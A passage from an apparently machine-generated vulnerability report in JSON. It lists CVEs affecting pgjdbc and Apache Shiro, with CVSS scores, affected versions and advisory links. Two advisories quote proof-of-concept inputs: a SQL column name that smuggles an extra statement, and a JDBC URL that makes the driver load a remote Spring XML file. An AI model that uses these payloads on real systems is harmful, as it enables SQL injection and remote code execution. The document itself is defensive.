List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41946"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41946"},{"summary":"NetApp Advisory 
ntap-20240329-0003","url":"https://security.netapp.com/advisory/ntap-20240329-0003"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":4.7,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":4.7,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":4.7,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.8"]}],"title":"CVE-2022-41946/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-26520"]}],"cve":"CVE-2022-26520","discovery_date":"2022-03-11T00:02:02","ids":[{"system_name":"CVE Record","text":"CVE-2022-26520"},{"system_name":"GitHub Advisory","text":"GHSA-673j-qm5f-xpv8"},{"system_name":"Postgresql Advisory","text":"changelog"},{"system_name":"Debian Advisory","text":"dsa-5196"},{"system_name":"Postgresql Advisory","text":"tomcat"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Path traversal in org.postgresql:postgresql"},{"category":"details","details":"Vulnerability Details","text":"# Path traversal in org.postgresql:postgresql In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. 
NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties. ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-26520, CVE-2022-26520"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.1.0|<42.3.3"],"known_not_affected":["org.postgresql/postgresql@42.3.3"]},"references":[{"summary":"GitHub Advisory GHSA-673j-qm5f-xpv8","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8"},{"summary":"Postgresql Advisory changelog","url":"https://jdbc.postgresql.org/documentation/changelog.html#version_42.3.3"},{"summary":"Postgresql Advisory tomcat","url":"https://jdbc.postgresql.org/documentation/head/tomcat.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26520"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26520"},{"summary":"Debian Advisory dsa-5196","url":"https://www.debian.org/security/2022/dsa-5196"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":3.1,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.1,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":3.1,"temporalSeverity":"LOW","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.1.0|<42.3.3"]}],"title":"CVE-2022-26520/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/
CVE-2022-31197"]}],"cve":"CVE-2022-31197","cwe":{"id":"89","name":"Improper Neutralization of Special Elements used in an SQL Command"},"discovery_date":"2022-08-06T05:51:38","ids":[{"system_name":"CVE Record","text":"CVE-2022-31197"},{"system_name":"GitHub Advisory","text":"GHSA-r38f-c4h4-hqq2"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names"},{"category":"details","details":"Vulnerability Details","text":"# PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names ### Impact _What kind of vulnerability is it? Who is impacted?_ The PGJDBC implementation of the `java.sql.ResultRow.refreshRow()` method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. `;`, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user. User applications that do not invoke the `ResultSet.refreshRow()` method are not impacted. User application that do invoke that method are impacted if the underlying database that they are querying via their JDBC application may be under the control of an attacker. The attack requires the attacker to trick the user into executing SQL against a table name who's column names would contain the malicious SQL and subsequently invoke the `refreshRow()` method on the ResultSet. For example: ```sql CREATE TABLE refresh_row_example ( id int PRIMARY KEY, \"1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * \" int ); ``` This example has a table with two columns. The name of the second column is crafted to contain a statement terminator followed by additional SQL. Invoking the `ResultSet.refreshRow()` on a ResultSet that queried this table, e.g. `SELECT * FROM refresh_row`, would cause the additional SQL commands such as the `SELECT pg_sleep(10)` invocation to be executed. 
As the multi statement command would contain multiple results, it would not be possible for the attacker to get data directly out of this approach as the `ResultSet.refreshRow()` method would throw an exception. However, the attacker could execute any arbitrary SQL including inserting the data into another table that could then be read or any other DML / DDL statement. Note that the application's JDBC user and the schema owner need not be the same. A JDBC application that executes as a privileged user querying database schemas owned by potentially malicious less-privileged users would be vulnerable. In that situation it may be possible for the malicious user to craft a schema that causes the application to execute commands as the privileged user. ### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes, versions 42.2.26, 42.3.7, and 42.4.1 have been released with a fix. ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ Check that you are not using the `ResultSet.refreshRow()` method. If you are, ensure that the code that executes that method does not connect to a database that is controlled by an unauthenticated or malicious user. If your application only connects to its own database with a fixed schema with no DDL permissions, then you will not be affected by this vulnerability as it requires a maliciously crafted schema. 
## Related CVE(s) BIT-postgresql-jdbc-driver-2022-31197, CVE-2022-31197"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.7"],"known_not_affected":["org.postgresql/postgresql@42.3.7"]},"references":[{"summary":"GitHub Advisory GHSA-r38f-c4h4-hqq2","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00009.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-31197"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-31197"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.1,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.7"]}],"title":"CVE-2022-31197/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-21724"]}],"cve":"CVE-2022-21724"
,"cwe":{"id":"665","name":"Improper Initialization"},"discovery_date":"2022-02-02T00:04:20","ids":[{"system_name":"CVE Record","text":"CVE-2022-21724"},{"system_name":"GitHub Advisory","text":"GHSA-v7wg-cpwc-24m4"},{"system_name":"Debian Advisory","text":"dsa-5196"},{"system_name":"NetApp Advisory","text":"ntap-20220311-0005"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements in Output Used by a Downstream Component","title":"Additional CWE: 74"},{"category":"description","details":"Vulnerability Description","text":"pgjdbc Does Not Check Class Instantiation when providing Plugin Classes"},{"category":"details","details":"Vulnerability Details","text":"# pgjdbc Does Not Check Class Instantiation when providing Plugin Classes ### Impact pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. 
Here's an example attack using an out-of-the-box class from Spring Framework: ``` DriverManager.getConnection(\"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml\"); ``` The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property) ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-21724, CVE-2022-21724"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.2"],"known_not_affected":["org.postgresql/postgresql@42.3.2"]},"references":[{"summary":"GitHub Advisory GHSA-v7wg-cpwc-24m4","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21724"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21724"},{"summary":"NetApp Advisory ntap-20220311-0005","url":"https://security.netapp.com/advisory/ntap-20220311-0005"},{"summary":"Debian Advisory 
dsa-5196","url":"https://www.debian.org/security/2022/dsa-5196"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.0,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.0,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.0,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.2"]}],"title":"CVE-2022-21724/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1957"]}],"cve":"CVE-2020-1957","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:53:18","ids":[{"system_name":"CVE Record","text":"CVE-2020-1957"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Authentication in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authentication in Apache Shiro Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.5.2"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17f371fc89d34df2d0c8131473fbc68154290e1be238895648f5a1e6%40%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb3982edf8bc8fcaa7a308e25a12d294fb4aac1f1e9d4e14fda639e77@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc64fb2336683feff3580c3c3a8b28e80525077621089641f2f386b63@%3Ccommits.camel.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00014.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1957"},{"summary":"CVE 
Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1957"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.1"]}],"title":"CVE-2020-1957/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13933"]}],"cve":"CVE-2020-13933","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:54:23","ids":[{"system_name":"CVE Record","text":"CVE-2020-13933"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Authentication bypass in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Authentication bypass in Apache Shiro Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.3"],"known_not_affected":["org.apache.shiro/shiro-core@1.6.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r18b45d560d76c4260813c802771cc9678aa651fb8340e09366bfa198@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r4506cedc401d6b8de83787f8436aac83956e411d66848c84785db46d@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4c1e1249e9e1acb868db0c80728c13f448d07333da06a0f1603c0a33@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r539f87706094e79c5da0826030384373f0041068936912876856835f%40%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r575301804bfac87a064359cf4b4ae9d514f2d10db7d44120765f4129@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6ea0224c1971a91dc6ade1f22508119a9c3bd56cef656f0c44bbfabb@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70098e336d02047ce4d4e69293fe8d558cd68cde06f6430398959bc4@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70b907ccb306e9391145e2b10f56cc6914a245f91720a17a486c020a@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8097b81905f2a113ebdf925bcbc6d8c9d6863c807c9ee42e1e7c9293@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r852971e28f54cafa7d325bd7033115c67d613b112a2a1076817390ac@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9d93dfb5df016b1a71a808486bc8f9fbafebbdbc8533625f91253f1d@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ea6d8560d6354d41433ad006069904f0ed083527aa348b5999261a7@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb47d88af224e396ee34ffb88ee99fb6d04510de5722cf14b7137e6bc@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rb5edf49cd1451475dbcf53826ba6ef1bb7872dd6493d6112eb0c2bad@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re25b8317b00a50272a7252c4552cf1a81a97984cc2111ef7728e48e0@%3Cdev.shiro.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/08/msg00002.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13933"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13933"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.3"]}],"title":"CVE-2020-13933/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40664"]}],"cve":"CVE-2022-40664","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2022-10-12T12:00:16","ids":[{"system_name":"CVE Record","text":"CVE-2022-40664"},{"system_name":"Apache Advisory","text":"apache-shiro-1101-released"},{"system_name":"NetApp Advisory","text":"ntap-20221118-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro Authentication Bypass 
vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro Authentication Bypass vulnerability Apache Shiro before 1.10.0, Authentication Bypass Vulnerability in Shiro when forwarding or including via RequestDispatcher."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.10.0"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/12/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/12/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/13/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/loc2ktxng32xpy7lfwxto13k4lvnhjwg"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40664"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40664"},{"summary":"NetApp Advisory ntap-20221118-0005","url":"https://security.netapp.com/advisory/ntap-20221118-0005"},{"summary":"Apache 
Advisory","url":"https://shiro.apache.org/blog/2022/10/10/2022/apache-shiro-1101-released.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.1"]}],"title":"CVE-2022-40664/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-32532"]}],"cve":"CVE-2022-32532","cwe":{"id":"285","name":"Improper Authorization"},"discovery_date":"2022-06-30T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-32532"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Authorization","title":"Additional CWE: 863"},{"category":"description","details":"Vulnerability Description","text":"Improper Authorization in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authorization in Apache Shiro Apache Shiro before 1.9.1, A RegexRequestMatcher can be misconfigured to be bypassed on some servlet containers. 
Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.0"],"known_not_affected":["org.apache.shiro/shiro-core@1.9.1"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-32532"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-32532"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.0"]}],"title":"CVE-2022-32532/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11989"]}],"cve":"CVE-2020-11989","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:53:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-11989"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Authentication in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authentication in Apache Shiro Apache Shiro is a 
powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management. Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.2"],"known_not_affected":["org.apache.shiro/shiro-core@1.5.3"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r408fe60bc8fdfd7c74135249d646d7abadb807ebf90f6fd2b014df21@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675%40%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcf3d8041e1232201fe5d74fc612a193e435784d64002409b448b58fe@%3Cdev.geode.apache.org%3E"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11989"},{"summary":"CVE 
Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11989"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.2"]}],"title":"CVE-2020-11989/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-41303"]}],"cve":"CVE-2021-41303","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-09-20T20:18:11","ids":[{"system_name":"CVE Record","text":"CVE-2021-41303"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220609-0001"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro vulnerable to a specially crafted HTTP request causing an authentication bypass"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro vulnerable to a specially crafted HTTP request causing an authentication bypass Apache Shiro before 1.8.0, when using Apache Shiro with Spring Boot, a specially crafted HTTP request may cause an authentication bypass. 
